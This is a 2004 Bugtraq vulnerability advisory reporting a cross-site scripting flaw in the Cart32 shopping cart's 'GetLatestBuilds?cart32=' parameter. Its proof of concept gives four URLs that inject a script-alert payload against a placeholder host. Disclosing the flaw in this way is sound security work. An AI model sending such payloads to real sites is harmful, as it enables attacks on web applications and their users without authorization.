Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Bugtraq: Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits Remote Cross-Site Scripting Attacks

Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits Remote Cross-Site Scripting Attacks

From: Dr Ponidi <drponidi_at_hackermail.com>
Date: Sun, 04 Jul 2004 01:35:19 +0800

Indonesia Security Development Team Advisory

Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits
Remote Cross-Site Scripting Attacks
======================================================================================================

     Advisory Name: Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits Remote Cross-Site Scripting Attacks
          Release Date: 12:50 AM 6/28/04
            Application: Cart32 Shopping Cart
                    Author: Dr`Ponidi <drponidi_at_indonesia.or.id>
            Discover by: Dr`Ponidi <drponidi_at_indonesia.or.id>
 Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
         Vendor Status: The vendor has been contacted
             Vendor URL: http://www.cart32.com
                  Reference: http://drponidi.5u.com/advisory.htm
                  Greetz to: #indohack #dhegleng Sincan2[at]#malanghackerlink.net

Proof Of Concept:
http://vulnerable/scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

http://vulnerable/scripts/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

[About Indonesia Security Development Team]
Indonesia Security Development Team researches and develops
intelligent, advanced application security assessment. Based in
Indonesia, Indonesia Security Development Team offers the best of
breed security consulting services, specializing in shopping carts
software and network security assessments. We provide security
information and patches for use by the entire network security
community.
 

This information is provided freely to all interested parties and may
be redistributed provided that it is not altered in any way, and that
the author is appropriately credited

Indonesia Security Development Team Advisory:
http://drponidi.5u.com/advisory.htm
_______________________________________________________________
Dr`Ponidi <drponidi_at_indonesia.or.id>

Original document can be fount at http://drponidi.5u.com/advisory.htm 

-- 
_______________________________________________
Get your free email from http://www.hackermail.com
Powered by Outblaze
Received on Jul 03 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]